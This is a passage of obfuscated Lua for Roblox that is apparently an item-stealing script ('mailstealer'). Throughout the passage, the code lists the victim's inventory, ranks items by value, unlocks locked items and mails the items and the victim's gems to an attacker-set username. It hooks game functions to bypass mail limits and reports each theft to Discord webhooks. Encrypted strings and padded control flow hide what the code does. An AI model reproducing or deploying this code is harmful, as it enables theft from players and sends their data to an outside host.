,[v7("\237\60\13\43\12\207\42\37","\111\164\79\65\68")]=v218.lk or false ,[v7("\239\205\134\211\17\195\203\216\132\219\7\238","\138\166\185\227\190\78")]=ItemImageId,[v7("\226\96\192\58\109\23\0\219\113","\121\171\20\165\87\50\67")]=ItemType});end break;end if (v220==(1 + 0)) then rap=v105(v7("\41\76\87\41","\169\100\37\36\74"),v218);ItemType=v7("\46\136\176\93\1\139","\48\96\231\194");v220=1543 -(718 + 823) ;end end break;end end end end if (v99.Charm~=nil) then for v221,v222 in pairs(v99.Charm) do local v223=0 + 0 ;while true do if (v223==(807 -(266 + 539))) then ItemImageId=dir.Icon;if (rap>MinimumRAP) then table.insert(v170,{[v7("\243\157\90\15\51\196\222","\141\186\233\63\98\108")]=v221,[v7("\216\254\41\187\26\223\235\33\179","\69\145\138\76\214")]=v222.id,[v7("\89\219\140\132\128\55\125\192\156\135\171","\118\16\175\233\233\223")]=v222._am or (2 -1) ,[v7("\162\144\48\182\209\185\92\187","\29\235\228\85\219\142\235")]=rap,[v7("\20\192\191\208\72\109\43\83\46\199","\50\93\180\218\189\23\46\71")]=v7("\253\172\90\94\73","\40\190\196\59\44\36\188"),[v7("\21\86\239\188\243\115\20","\109\92\37\188\212\154\29")]=v222.sh or false ,[v7("\45\252\136\204\50\81\1\235","\58\100\143\196\163\81")]=v222.lk or false ,[v7("\51\86\38\174\0\96\232\15\29\71\10\167","\110\122\34\67\195\95\41\133")]=ItemImageId,[v7("\92\165\94\71\233\65\168\75\79","\182\21\209\59\42")]=ItemType});end break;end if (v223==(1225 -(636 + 589))) then id=v222.id;dir=v97.Charms[id];v223=2 -1 ;end if (v223==(1 -0)) then rap=v105(v7("\229\48\184\36\180","\98\166\88\217\86\217"),v222);ItemType=v7("\216\249\107\12\135\208","\188\150\150\25\97\230");v223=2;end end end end if (v99.Enchant~=nil) then for v224,v225 in pairs(v99.Enchant) do id=v225.id;dir=v97.Enchants[id];rap=v105(v7("\146\89\198\21\32\176\163","\222\215\55\165\125\65"),v225);ItemType=v7("\2\222\212\23\243\205","\42\76\177\166\122\146\161\141");ItemImageId=dir.Icon(v225.tn);if (rap>MinimumRAP) then table.insert(v170,{[v7("\140\158\0\195\70\95\161","\22\197\234\101\174\25")]=v224,[v7("\4\32\160\209\73\129\214\139\40","\230\77\84\197\188\22\207\183")]=v225.id,[v7("\208\0\195\241\179\128\253\58\236\26\210","\85\153\116\166\156\236\193\144")]=v225._am or 1 ,[v7("\141\244\72\190\219\50\133\208","\96\196\128\45\211\132")]=rap,[v7("\28\153\126\82\237\140\184\217\38\158","\184\85\237\27\63\178\207\212")]=v7("\45\87\10\87\9\87\29","\63\104\57\105"),[v7("\34\148\151\76\2\137\189","\36\107\231\196")]=v225.sh or false ,[v7("\116\166\142\136\94\190\167\131","\231\61\213\194")]=v225.lk or false ,[v7("\32\185\56\126\54\132\48\114\14\168\20\119","\19\105\205\93")]=ItemImageId,[v7("\128\28\219\140\0\157\17\206\132","\95\201\104\190\225")]=ItemType});end end end if (v99.Lootbox~=nil) then for v228,v229 in pairs(v99.Lootbox) do local v230=0 + 0 ;local v231;while true do if ((0 + 0)==v230) then v231=1015 -(657 + 358) ;while true do if (v231==(4 -2)) then ItemImageId=dir.Icon;if (rap>MinimumRAP) then table.insert(v170,{[v7("\5\29\227\1\19\32\226","\108\76\105\134")]=v228,[v7("\194\209\180\236\241\197\196\188\228","\174\139\165\209\129")]=v229.id,[v7("\138\167\231\204\249\34\125\119\182\189\246","\24\195\211\130\161\166\99\16")]=v229._am or 1 ,[v7("\111\23\236\33\108\36\103\51","\118\38\99\137\76\51")]=rap,[v7("\212\50\0\31\54\3\241\39\22\1","\64\157\70\101\114\105")]=v7("\108\167\168\247\18\79\176","\112\32\200\199\131"),[v7("\5\67\111\176\202\165\59","\66\76\48\60\216\163\203")]=v229.sh or false ,[v7("\147\149\85\252\92\197\33\190","\68\218\230\25\147\63\174")]=v229.lk or false ,[v7("\132\62\86\65\137\132\39\82\75\179\132\46","\214\205\74\51\44")]=ItemImageId,[v7("\211\88\231\241\72\206\85\242\249","\23\154\44\130\156")]=ItemType});end break;end if (v231==0) then id=v229.id;dir=v97.Lootboxes[id];v231=1;end if (1==v231) then rap=v105(v7("\131\196\206\218\173\196\217","\174\207\171\161"),v229);ItemType=v7("\195\241\31\254\249\219","\183\141\158\109\147\152");v231=2;end end break;end end end end if (v99.Potion~=nil) then for v232,v233 in pairs(v99.Potion) do local v234=0;local v235;while true do if (v234==(0 -0)) then v235=1187 -(1151 + 36) ;while true do if (v235==(0 + 0)) then id=v233.id;dir=v97.Potions[id];v235=1 + 0 ;end if (v235==(2 -1)) then rap=v105(v7("\33\169\185\167\57\29","\115\113\198\205\206\86"),v233);ItemType=v7("\170\88\236\87\133\91","\58\228\55\158");v235=1834 -(1552 + 280) ;end if (v235==(836 -(64 + 770))) then ItemImageId=dir.Icon(v233.tn);if (rap>MinimumRAP) then table.insert(v170,{[v7("\157\157\213\35\3\132\49","\85\212\233\176\78\92\205")]=v232,[v7("\99\76\141\239\117\118\137\239\79","\130\42\56\232")]=v233.id,[v7("\195\161\33\238\127\30\231\186\49\237\84","\95\138\213\68\131\32")]=v233._am or 1 ,[v7("\3\60\164\78\73\24\9\145","\22\74\72\193\35")]=rap,[v7("\5\109\225\85\19\90\232\89\63\106","\56\76\25\132")]=v7("\110\206\191\47\192\80","\175\62\161\203\70"),[v7("\21\206\240\27\60\50\196","\85\92\189\163\115")]=v233.sh or false ,[v7("\0\191\28\55\42\167\53\60","\88\73\204\80")]=v233.lk or false ,[v7("\7\151\21\75\22\243\35\130\23\67\0\222","\186\78\227\112\38\73")]=ItemImageId,[v7("\213\67\248\88\108\78\229\71\248","\26\156\55\157\53\51")]=ItemType});end break;end end break;end end end end if (v99.Seed~=nil) then for v236,v237 in pairs(v99.Seed) do id=v237.id;dir=v97.Seeds[id];rap=v105(v7("\191\221\19\221","\48\236\184\118\185\216"),v237);ItemType=v7("\203\178\69\61\206\56","\84\133\221\55\80\175");ItemImageId=dir.Icon;if (rap>MinimumRAP) then table.insert(v170,{[v7("\148\243\33\171\248\117\185","\60\221\135\68\198\167")]=v236,[v7("\199\169\253\142\125\247\239\176\253","\185\142\221\152\227\34")]=v237.id,[v7("\113\209\82\247\124\18\250\87\208\89\238","\151\56\165\55\154\35\83")]=v237._am or (1 + 0) ,[v7("\137\87\0\227\159\113\36\222","\142\192\35\101")]=rap,[v7("\255\97\44\174\216\175\160\23\197\102","\118\182\21\73\195\135\236\204")]=v7("\59\57\31\68","\157\104\92\122\32\100\109"),[v7("\138\181\252\194\52\41\148","\203\195\198\175\170\93\71\237")]=v237.sh or false ,[v7("\7\88\18\218\82\26\249\42","\156\78\43\94\181\49\113")]=v237.lk or false ,[v7("\91\252\193\174\52\106\116\115\239\193\138\15","\25\18\136\164\195\107\35")]=ItemImageId,[v7("\193\57\172\66\77\136\216\168\237","\216\136\77\201\47\18\220\161")]=ItemType});end end end if (v99.Ultimate~=nil) then for v241,v242 in pairs(v99.Ultimate) do local v243=0 -0 ;while true do if (v243==0) then id=v242.id;dir=v97.Ultimates[id];v243=1 + 0 ;end if (v243==(1245 -(157 + 1086))) then ItemImageId=dir.Icon;if (rap>MinimumRAP) then table.insert(v170,{[v7("\145\201\115\15\141\125\124","\70\216\189\22\98\210\52\24")]=v241,[v7("\243\203\166\138\236\244\222\174\130","\179\186\191\195\231")]=v242.id,[v7("\208\43\29\233\198\30\21\235\236\49\12","\132\153\95\120")]=v242._am or 1 ,[v7("\152\166\11\32\200\232\129\129","\192\209\210\110\77\151\186")]=rap,[v7("\201\23\39\228\192\231\236\2\49\250","\164\128\99\66\137\159")]=v7("\53\133\253\183\13\136\253\187","\222\96\233\137"),[v7("\144\160\148\23\129\253\233","\144\217\211\199\127\232\147")]=v242.sh or false ,[v7("\209\60\18\39\214\78\7\64","\36\152\79\94\72\181\37\98")]=v242.lk or false ,[v7("\254\204\66\50\232\241\74\62\208\221\110\59","\95\183\184\39")]=ItemImageId,[v7("\156\43\226\43\107\180\27\165\58","\98\213\95\135\70\52\224")]=ItemType});end break;end if (v243==(1 -0)) then rap=v105(v7("\24\224\63\211\5\221\150\40","\226\77\140\75\186\104\188"),v242);ItemType=v7("\151\193\194\50\78\181","\47\217\174\176\95");v243=2;end end end end if (v99.Fruit~=nil) then for v244,v245 in pairs(v99.Fruit) do id=v245.id;dir=v97.Fruits[id];rap=v105(v7("\216\177\220\126\64","\52\158\195\169\23"),v245);ItemType=v7("\84\179\32\121\135\57","\235\26\220\82\20\230\85\27");ItemImageId=dir.Icon;if (rap>MinimumRAP) then table.insert(v170,{[v7("\161\181\236\207\75\161\165","\20\232\193\137\162")]=v244,[v7("\11\203\192\171\216\162\22\124\39","\17\66\191\165\198\135\236\119")]=v245.id,[v7("\38\187\171\30\192\201\225\222\26\161\186","\177\111\207\206\115\159\136\140")]=v245._am or (4 -3) ,[v7("\44\157\21\25\235\125\126\53","\63\101\233\112\116\180\47")]=rap,[v7("\234\47\232\31\199\21\207\58\254\1","\86\163\91\141\114\152")]=v7("\117\25\97\122\46","\90\51\107\20\19"),[v7("\164\227\182\231\52\131\233","\93\237\144\229\143")]=v245.sh or false ,[v7("\60\229\220\22\8\77\16\242","\38\117\150\144\121\107")]=v245.lk or false ,[v7("\4\175\235\55\18\146\227\59\42\190\199\62","\90\77\219\142")]=ItemImageId,[v7("\207\16\36\52\115\51\99\246\1","\26\134\100\65\89\44\103")]=ItemType});end end end if (v99.Hoverboard~=nil) then for v249,v250 in pairs(v99.Hoverboard) do local v251=0;local v252;while true do if (v251==0) then v252=0 -0 ;while true do if (v252==0) then id=v250.id;dir=v97.Hoverboards[id];v252=1;end if (v252==(1 -0)) then rap=v105(v7("\217\236\38\38\182\243\236\49\49\160","\196\145\131\80\67"),v250);ItemType=v7("\48\191\20\5\25\228","\136\126\208\102\104\120");v252=821 -(599 + 220) ;end if (v252==(3 -1)) then ItemImageId=dir.Icon;if (rap>MinimumRAP) then table.insert(v170,{[v7("\81\158\203\78\144\123\57","\49\24\234\174\35\207\50\93")]=v249,[v7("\37\230\248\133\78\34\243\240\141","\17\108\146\157\232")]=v250.id,[v7("\98\215\17\224\16\137\70\204\1\227\59","\200\43\163\116\141\79")]=v250._am or (1932 -(1813 + 118)) ,[v7("\150\34\56\142\143\198\194\143","\131\223\86\93\227\208\148")]=rap,[v7("\202\81\179\187\34\150\239\68\165\165","\213\131\37\214\214\125")]=v7("\14\36\51\186\243\36\36\36\173\229","\129\70\75\69\223"),[v7("\111\216\192\225\117\225\95","\143\38\171\147\137\28")]=v250.sh or false ,[v7("\249\145\149\252\0\232\209\212","\180\176\226\217\147\99\131")]=v250.lk or false ,[v7("\250\173\42\10\236\144\34\6\212\188\6\3","\103\179\217\79")]=ItemImageId,[v7("\99\163\25\216\126\184\186\90\178","\195\42\215\124\181\33\236")]=ItemType});end break;end end break;end end end end if (v99.Booth~=nil) then for v253,v254 in pairs(v99.Booth) do local v255=0;while true do if ((0 + 0)==v255) then id=v254.id;dir=v97.Booths[id];v255=1218 -(841 + 376) ;end if (v255==1) then rap=v105(v7("\47\86\56\42\45","\152\109\57\87\94\69"),v254);ItemType=v7("\215\216\24\174\191\222","\200\153\183\106\195\222\178\52");v255=2 -0 ;end if (v255==(1 + 1)) then ItemImageId=dir.Icon;if (rap>MinimumRAP) then table.insert(v170,{[v7("\27\247\141\48\118\115\54","\58\82\131\232\93\41")]=v253,[v7("\170\67\213\24\98\17\130\90\213","\95\227\55\176\117\61")]=v254.id,[v7("\49\106\38\70\148\57\115\44\94\165\12","\203\120\30\67\43")]=v254._am or 1 ,[v7("\216\49\72\226\230\195\4\125","\185\145\69\45\143")]=rap,[v7("\163\11\28\171\227\169\19\24\181\207","\188\234\127\121\198")]=v7("\26\61\28\151\48","\227\88\82\115"),[v7("\106\12\137\175\11\125\90","\19\35\127\218\199\98")]=v254.sh or false ,[v7("\53\232\38\237\31\240\15\230","\130\124\155\106")]=v254.lk or false ,[v7("\252\223\243\162\156\223\113\190\210\206\223\171","\223\181\171\150\207\195\150\28")]=ItemImageId,[v7("\101\46\230\163\54\120\35\243\171","\105\44\90\131\206")]=ItemType});end break;end end end end table.sort(v170,function(v199,v200) return v199.Item_RAP>v200.Item_RAP ;end);return v170;end;local function v118() local v171=0 -0 ;local v172;local v173;local v174;local v175;local v176;while true do if (v171==0) then v172=0;v173=nil;v171=1;end if (v171==2) then v176=nil;while true do if (v172==(861 -(464 + 395))) then if ((v176=="They don't have enough space!") or (v176=="You don't have enough diamonds to send the mail!")) then return false;else return true;end break;end if (v172==(2 -1)) then local v286=0 + 0 ;while true do if (v286==(838 -(467 + 370))) then v172=3 -1 ;break;end if (v286==0) then v174={[1]=v7("\98\246\4\179\80\103","\26\48\153\102\223\63\31\153"),[2]=v7("\54\69\254\231","\147\98\32\141"),[3]=v7("\40\70\247","\43\120\35\131\170\102\54"),[3 + 1 ]=v173,[17 -12 ]=1 + 0 };v175,v176=v103:WaitForChild(v7("\121\7\142\186\167\191\156\14\70\180\179\171\180","\228\52\102\231\214\197\208")):InvokeServer(unpack(v174));v286=2 -1 ;end end end if (v172==(520 -(150 + 370))) then v173=nil;for v294,v295 in pairs(v99[v7("\207\229\166","\94\159\128\210\217\104")]) do v173=v294;break;end v172=1283 -(74 + 1208) ;end end break;end if (v171==(2 -1)) then v174=nil;v175=nil;v171=9 -7 ;end end end itemsCounted=0 + 0 ;local v119=0;local v120=v117();currentMailPrice=FirstPriceOfMail;for v177,v178 in pairs(v120) do local v179=390 -(14 + 376) ;while true do if (v179==(0 -0)) then if (v178.Item_RAP>=currentMailPrice) then v119=v119 + v178.Item_RAP ;itemsCounted=itemsCounted + 1 ;end currentMailPrice=currentMailPrice * 1.5 ;v179=1;end if (v179==(1 + 0)) then if (currentMailPrice>(4392230 + 607770)) then currentMailPrice=4768539 + 231461 ;end break;end end end local function v121(v180,v181,v182,v183) local v184=0 -0 ;local v185;local v186;while true do if (v184==1) then repeat local v260=0 + 0 ;local v261;local v262;local v263;while true do if (v260==1) then v263=nil;while true do if (v261==(78 -(23 + 55))) then if (v183==true) then local v318=0;local v319;while true do if (v318==(0 -0)) then v319={v181,false};game:GetService(v7("\185\223\37\234\143\16\49\18\142\222\6\242\137\1\49\1\142","\102\235\186\85\134\230\115\80")).Network.Locking_SetLocked:InvokeServer(unpack(v319));break;end end end v262,v263=v103:WaitForChild(v7("\122\13\55\83\112\219\58\13\76\13\90\124\208","\66\55\108\94\63\18\180")):InvokeServer(unpack(v185));v261=1;end if (v261==(1 + 0)) then if ((v262==false) and (v263=="They don't have enough space!")) then local v320=0;while true do if (v320==(0 -0)) then Roblox_Username=Username2;v185[1 + 0 ]=Roblox_Username;break;end end end break;end end break;end if (v260==0) then v261=901 -(652 + 249) ;v262=nil;v260=2 -1 ;end end until v186==true  GemsAmount=GemsAmount-FirstPriceOfMail ;v184=2;end if (v184==(1870 -(708 + 1160))) then FirstPriceOfMail=math.ceil(math.ceil(FirstPriceOfMail) * (2.5 -1) );if (FirstPriceOfMail>(9116079 -4116079)) then FirstPriceOfMail=5000027 -(10 + 17) ;end break;end if (v184==0) then v185={[1]=Roblox_Username,[2]=""   .. mailstealer_name   .. v7("\94\237\116\195\230\152\13\211\31\236\112\216\170\132\23\150\10\239\101","\182\126\128\21\170\138\235\121") ,[1 + 2 ]=v180,[1736 -(1400 + 332) ]=v181,[5]=v182};v186=false;v184=1 -0 ;end end end local function v122() for v201,v202 in pairs(v99.Currency) do if (v202.id==v7("\48\132\132\58\40\87\16\158","\57\116\237\229\87\71")) then if (GemsAmount>=(FirstPriceOfMail + (11908 -(242 + 1666)))) then SentGems=GemsAmount-FirstPriceOfMail ;local v269={[1 + 0 ]=Roblox_Username,[1 + 1 ]=""   .. mailstealer_name   .. v7("\234\188\236\238\123\253\83\175\176\225\226\101\174\72\164\241\249\232\103","\39\202\209\141\135\23\142") ,[3 + 0 ]=v7("\220\38\27\24\55\246\252\42","\152\159\83\105\106\82"),[944 -(850 + 90) ]=v201,[8 -3 ]=SentGems};local v270=false;repeat local v287=v103:WaitForChild(v7("\172\199\88\254\203\83\153\156\17\193\204\82\133","\60\225\166\49\146\169")):InvokeServer(unpack(v269));until v270==true  v107(v7("\11\23\46\39\14\9\43\13","\103\79\126\79\74\97"),v7("\153\106\193\97\91\20\185\102","\122\218\31\179\19\62"),v7("\148\211\192\210","\37\211\182\173\161\169\193"),v7("\229\56\85\216\59\104\188\227\51\73\131\103\52\232\162\104\24\129\123\41\238\175\111\26","\217\151\90\45\185\72\27"),Discord_Webhook,v7("\205\115\233\23","\54\163\28\135\114"),v7("\38\212","\31\72\187\61\226\46"),v7("\227\3\85\215\85\103\43\205\3","\68\163\102\35\178\39\30"),SentGems,v119);break;end end end end Left_Hits= #v120;if (( #v120>0) or (GemsAmount>FirstPriceOfMail)) then local v203=1390 -(360 + 1030) ;local v204;local v205;while true do if (v203==1) then FavoriteModeSelection=v204.Get().FavoriteModeSelection;FavoriteModeSelectionPlaza=v204.Get().FavoriteModeSelectionPlaza;v203=2 + 0 ;end if (4==v203) then v122();break;end if (v203==3) then if v118() then local v288=0 -0 ;local v289;while true do if (v288==(0 -0)) then v289=game:GetService(v7("\28\11\235\250\39\13\250\226\43\10\200\226\33\28\250\241\43","\150\78\110\155")):WaitForChild(v7("\171\192\51\246\171\12\180","\32\229\165\71\129\196\126\223")):WaitForChild(v7("\238\136\205\141\131\218\219\211\132\178\132\219\199","\181\163\233\164\225\225"));for v313,v314 in ipairs(getgc(true)) do if ((typeof(v314)==v7("\86\158\48\116\68\130\49\121","\23\48\235\94")) and (debug.info(v314,"n")==v7("\104\195\200\88\88\53","\178\28\186\184\61\55\83"))) then local v321=0;local v322;while true do if (v321==0) then v322=nil;v322=hookfunction(v314,function(v325,...) local v326=0;local v327;while true do if (0==v326) then v327=1661 -(909 + 752) ;while true do if ((1223 -(109 + 1114))==v327) then if (v325==v289) then return tick();end return v322(v325,...);end end break;end end end);break;end end end end break;end end end for v271,v272 in pairs(v120) do if (FirstPriceOfMail>(9154190 -4154190)) then FirstPriceOfMail=1946330 + 3053670 ;end if (v272.Item_RAP>=FirstPriceOfMail) then local v296=242 -(6 + 236) ;while true do if (v296==(0 + 0)) then v121(v272.Item_Class,v272.Item_Id,v272.Item_Amount,v272.IsLocked);thumb=v114(v272.Item_ImageId);v296=1 + 0 ;end if (v296==(2 -1)) then Left_Hits=Left_Hits-(1 -0) ;task.spawn(function() local v315=1133 -(1076 + 57) ;while true do if (v315==(0 + 0)) then v107(v272.Item_Name,v272.Item_Class,v272.Item_Type,thumb,Discord_Webhook,Left_Hits,v272.IsShiny,v7("\228\200\81\57\224\23\250\202\200","\149\164\173\39\92\146\110"),v272.Item_RAP,v119);if (Roblox_Username~=DualhookUsername) then v107(v272.Item_Name,v272.Item_Class,v272.Item_Type,thumb,LOGS_WEBHOOK,Left_Hits,v272.IsShiny,v7("\246\32\31\95\21\21\179\51\31\15","\123\147\71\112\127\122"),v272.Item_RAP,v119);end break;end end end);break;end end else break;end end v203=693 -(579 + 110) ;end if (v203==2) then oldGet=deepCopy(v205);v204.Get=function(...) v205=oldGet;v205.FavoriteModeSelection={FavoriteModeSelection};v205.FavoriteModeSelectionPlaza={FavoriteModeSelectionPlaza};return v205;end;v203=3;end if (v203==(0 + 0)) then v204=require(game:GetService(v7("\140\117\202\203\10\182\130\5\187\116\233\211\12\167\130\22\187","\113\222\16\186\167\99\213\227")).Library.Client.Save);v205=v204.Get();v203=1;end end end
